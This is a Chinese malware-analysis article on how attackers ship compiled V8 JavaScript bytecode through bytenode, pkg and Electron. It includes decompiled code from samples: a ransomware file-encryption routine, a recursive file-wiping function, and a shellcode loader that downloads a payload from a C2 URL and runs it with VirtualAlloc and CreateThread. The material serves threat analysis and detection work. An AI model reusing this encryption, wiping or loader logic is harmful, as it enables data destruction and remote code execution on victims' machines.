V8编译
const vm = require('vm');
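// Compiling JavaScript into serialized bytecode (a V8 "code cache").
// `produceCachedData: true` is the deprecated form; `script.createCachedData()`
// is the current API and yields the same serialized buffer.  The buffer is only
// accepted by a V8 whose version/flag hashes match the ones recorded in the
// cached-data header, so it has to be produced on a build matching the target.
const helloWorld = new vm.Script("console.log('hello world!')");
const compiledBuffer = helloWorld.createCachedData();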
const bytenode = require('bytenode');
// Compiling JavaScript into bytecode and executing it (bytenode, a third-party package).
// NOTE(review): recent bytenode releases make compileFile() asynchronous (it returns a
// Promise); if that is the installed version the require() below can run before the
// .jsc file exists — confirm against the version in use.
bytenode.compileFile('script.js', 'script.jsc'); // Compiling JavaScript to bytecode
// require('bytenode') registers a loader for the .jsc extension, so this executes the
// cached bytecode directly: the original source is never present on disk.
require('./script.jsc'); // Running the compiled bytecode
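// Header that precedes a V8 serialized code cache ("cached data") payload; every
// field is a 32-bit word.  On load V8 checks the version/source/flag hashes against
// the running engine and rejects a mismatching cache, which is why compiled bytecode
// is only portable between identical V8 builds.
// NOTE(review): the name presumably should be CachedDataHeaders; kept as-is so the
// listing still matches the name used in the article.
struct CahcedDataHeaders
{
  static const uint32_t kMagicNumber;   // 0xC0DE0000 ^ ExternalReferenceTable::kSize
  static const uint32_t kVersionHash;   // V8 version hashed
  static const uint32_t kSourceHash;    // Original source code length
  static const uint32_t kFlagHash;      // V8 flags hashed
  static const uint32_t kPayloadLength; // Bytecode length
  static const uint32_t kChecksum;      // Adler-32 checksum of the bytecode; whether it is
                                        // verified on load depends on the V8 build/flags —
                                        // confirm for the target version before relying on it
};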
V8执行
- 提供编译后的脚本以及与编译时 V8 版本相匹配的 Node.js 引擎(缓存数据头中的版本/标志哈希与运行引擎不一致时,字节码会被拒绝加载);
- 使用 Node.js 打包器(如 pkg 或 nexe)将 Node.js 运行时与已编译脚本打包成单个可执行文件。在 pkg 的情况下,打包程序默认会把所有脚本文件编译为字节码;
- 利用 Electron 框架(允许使用 Web 技术开发跨平台桌面应用程序)来分发并执行编译后的脚本。
ChromeLoader
勒索软件和擦除器(wiper)
// Decompiled pseudo-JS (appears to be View8-style output) of the ransomware's
// per-file routine: rN are bytecode registers, ACCU the accumulator, and the
// hex suffixes are the SharedFunctionInfo addresses the decompiler saw.
// The logic is kept verbatim; only comments were added.
function encryptFile_0000023737FA04E9(file_name) {
// NOTE(review): decompiler artifact — this extra "{" is what the closing "}"
// at the end matches, so the function itself is never closed in this listing.
{
// Skip anything larger than 100 MB (100,000,000 bytes, decimal).
r6 = fs["statSync"](file_name)
if (r6["size"] > 100000000)
{
return undefined
}
// Skip hidden files (isHiddenFile is defined elsewhere in the sample).
r6 = isHiddenFile(file_name)
if (r6 == true)
{
return undefined
}
// AES-256-CBC with `key`/`iv` taken from an outer scope not shown here, so
// whether they are per-victim, hard-coded or derived cannot be told from this listing.
r1 = crypto["createCipheriv"]("aes-256-cbc", key, iv)
// Source and destination are the same path: the write stream (default flags
// truncate the file) is opened while the read stream is still consuming it, so
// the result is likely not a recoverable ciphertext of the original content.
r2 = fs["createReadStream"](file_name)
r3 = fs["createWriteStream"](file_name)
r7 = r2["pipe"](r1)
ACCU = r7["pipe"](r3)
// Completion callback (not shown) runs once the write stream finishes.
ACCU = r3["on"]("finish", SharedFunctionInfo_0000023737FA0769)
return undefined
}
// Wiper entry point: `a0` is the directory to destroy.  Scope[2][2] is the
// decompiler's rendering of a closure-context slot — presumably the captured
// directory parameter read by the forEach callback below, allocated per call;
// verify against the decompiler's scope model before treating it as a global.
function destroyFiles_000000CBE13DDDC1(a0) {
Scope[2][2] = a0
// Synchronous directory listing; every entry name is handed to the callback.
r0 = fs["readdirSync"](Scope[2][2])
ACCU = r0["forEach"](SharedFunctionInfo_000000CBE13DDF51)
return undefined
}
// forEach callback of destroyFiles: `a0` is one directory entry name, joined
// with the directory held in the closure slot Scope[2][2].
function SharedFunctionInfo_000000CBE13DDF51(a0) {
r0 = path["join"](Scope[2][2], a0)
r1 = fs["statSync"](r0)
if (r1["isDirectory"]())
{
// Recurse into subdirectories.
ACCU = destroyFiles_000000CBE13DDDC1(r0)
}
else
{
// Overwrite the file with a random entry from `string_list` (defined
// elsewhere).  The contents are replaced outright, not encrypted, so there
// is nothing to decrypt: this is destruction, not ransom.
// `"Math"["random"]` appears to be how the decompiler renders Math.random.
r9 = "Math"["random"]()
r6 = string_list["Math"["floor"]((string_list["length"] * r9))]
r5 = r0
ACCU = fs["writeFileSync"](r5, r6, "utf8")
}
return undefined
}
Shellcode加载器
// Decompiled shellcode loader: fetches a payload over HTTP and runs it in-process
// through Win32 calls made via the third-party ffi-napi/ref-napi bindings.
http = require("http")
r3 = require("./update.js") // configuration file containing C2
ffi_napi = require("ffi-napi")
ref_napi = require("ref-napi")
// Native type handles used to describe the kernel32 function signatures.
Scope[1][4] = ref_napi["types"]["uint64"]
Scope[1][5] = ref_napi["types"]["uint32"]
Scope[1][6] = ref_napi["types"]["void"]
Scope[1][7] = ref_napi["refType"](Scope[1][6])
Scope[1][8] = Scope[1][7]
Scope[1][9] = ref_napi["refType"](Scope[1][5])
// Stage-2 fetch: plain HTTP GET to the URL stored under `UpdateSoftware` in
// update.js; get_shellcode (not shown) receives the response.  No TLS and no
// integrity check on the downloaded bytes are visible in this excerpt.
r4 = http["get"](r3["UpdateSoftware"], get_shellcode)
ACCU = r4["on"]("error", SharedFunctionInfo_000002F3D955EA09)
// r7 is presumably the kernel32 signature table; its definition is not in this excerpt.
r1 = ffi_napi["Library"]("kernel32", r7)
r6 = r1
// VirtualAlloc(NULL, len, 12288 = 0x3000 = MEM_COMMIT|MEM_RESERVE, 64 = 0x40 = PAGE_EXECUTE_READWRITE):
// a single RWX allocation from a Node process — the classic injection pattern and a cheap detection hook.
r2 = r1["VirtualAlloc"](null, shellcode_buffer["length"], 12288, 64)
r6 = r1
r7 = r2
// Copy the fetched bytes into the RWX region (shellcode_buffer is filled elsewhere).
ACCU = r1["RtlMoveMemory"](r7, shellcode_buffer, shellcode_buffer["length"])
// Out-parameter that receives the new thread id.
r7 = ref_napi["refType"](ref_napi["types"]["uint32"])
r3 = ref_napi["alloc"](r7)
r6 = r1
r9 = r2
r12 = r3
// CreateThread(attrs=NULL, stack=0, start=allocation, param=NULL, flags=0, &tid),
// then block forever (4294967295 = 0xFFFFFFFF = INFINITE) so the Node process
// stays alive while the shellcode runs.
r4 = r1["CreateThread"](null, 0, r9, null, 0, r12)
ACCU = r1["WaitForSingleObject"](r4, 4294967295.0)
原文始发于微信公众号(FreeBuf):探索编译的V8 JavaScript在恶意软件中的应用
免责声明:文章中涉及的程序(方法)可能带有攻击性,仅供安全研究与教学之用,读者将其信息做其他用途,由读者承担全部法律及连带责任,本站不承担任何法律及连带责任;如有问题可邮件联系(建议使用企业邮箱或有效邮箱,避免邮件被拦截,联系方式见首页),望知悉。